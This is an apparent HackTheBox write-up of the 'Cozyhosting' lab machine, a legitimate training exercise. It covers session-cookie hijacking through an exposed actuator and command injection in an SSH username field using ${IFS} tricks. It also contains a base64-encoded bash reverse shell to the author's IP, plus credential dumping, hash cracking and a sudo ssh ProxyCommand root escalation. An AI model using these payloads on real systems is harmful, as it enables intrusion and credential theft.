Cozyhosting
Cozyhosting is an easy machine from hackthebox which involved injection a session cookie redirecting to admin page. PLaying with the username field, got an error disclosing ssh command usage in the backend. After trying various bypassing methods sent the command without spaces and got back a shell as app user. Found credentials of postgres user in a jar file and dumped the hashes from the database. Cracked them using jtr and got access to josh user. Further enumerating, ssh can be run by josh user with root permissions.
NMAP TCP SCAN
# nmap -sC -sV -p- -vv --reason --min-rate=1000 -T4 10.10.11.230 -oN nmap_tcp_scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEpNwlByWMKMm7ZgDWRW+WZ9uHc/0Ehct692T5VBBGaWhA71L+yFgM/SqhtUoy0bO8otHbpy3bPBFtmjqQPsbC8=
| 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHVzF8iMVIHgp9xMX9qxvbaoXVg1xkGLo61jXuUAYq5q
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 72A61F8058A9468D57C3017158769B1F
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80
- Surfing the website we got a cookie named JSESSIONID
# gobuster dir -u http://cozyhosting.htb/ -w /usr/share/wordlists/dirb/common.txt
/admin (Status: 401) [Size: 97]
/error (Status: 500) [Size: 73]
/index (Status: 200) [Size: 12706]
/login (Status: 200) [Size: 4431]
/logout (Status: 204) [Size: 0]
# gobuster dir -u http://cozyhosting.htb/ -w /usr/share/wordlists/wfuzz/general/megabeast.txt -t 30
/actuator (Status: 200) [Size: 634]
-
Going to the
actuator
page -
Going to /sessions directory got two session cookie
{ "2F3333AC963252641A3BD937836A555A":"kanderson",
"2399F09710F0FCD106D670E1B184FAF0":"UNAUTHORIZED" }
-
Intercepting the /login endpoint request in burpsuite and sending the above cookie value in place of
JSESSIONID
and we get redirected to a /admin page -
Below on that page we have connection settings (hostname and username)
-
Intercepting the request in burpsuite and submitting username field as empty we get an error:
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file
-
It means on the backend it is attempting a SSH connection.
-
After trying some command injections, concluded that we cannot use spaces in the username field
-
Google searched and got : https://unix.stackexchange.com/questions/351331/how-to-send-a-command-with-arguments-without-spaces
-
Again tried with sending username (URL encoded) as
;whoami${IFS%??};
but didn’t got any output -
So tried
;ping${IFS%??}-c${IFS%??}2${IFS%??}10.10.14.81${IFS%??};
(URL encoded) and on my machinesudo tcpdump -i tun0 icmp
and got connection back -
So we can try to run a reverse shell (URL encoded):
echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44MS84ODg4IDA+JjEK"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash
and got a shell back
Enum as app user
-
Spawned fully interactive TTY Shell
-
Found a file
cloudhosting-0.0.1.jar
in the /app directory and transferred it into my machine -
Searched for passwords after unjar the file:
unjar xvf cloudhosting-0.0.1.jar
,grep -iR 'password' .
and got a file with credentials:BOOT-INF/classes/application.properties
-
Got credentials of postgres user: Vg&nvzAQ7XxR
-
Using these credentials connected to postgress database:
psql -h 127.0.0.1 -U postgres
-
Connected to cozyhosting database and got creds
cozyhosting=# \c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \d
List of relations
Schema | Name | Type | Owner
--------+--------------+----------+----------
public | hosts | table | postgres
public | hosts_id_seq | sequence | postgres
public | users | table | postgres
(3 rows)
cozyhosting=# select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
-
Copied the hashes into a file and cracked them using JTR:
john hashes --wordlist=/usr/share/wordlists/rockyou.txt
-
We got a password manchesterunited
-
Tried this password on josh and we get successfully logged in.
Enum as josh user
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
- Went to gtfobins and got the shell as root
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x
root@cozyhosting:/home/josh# whoami
root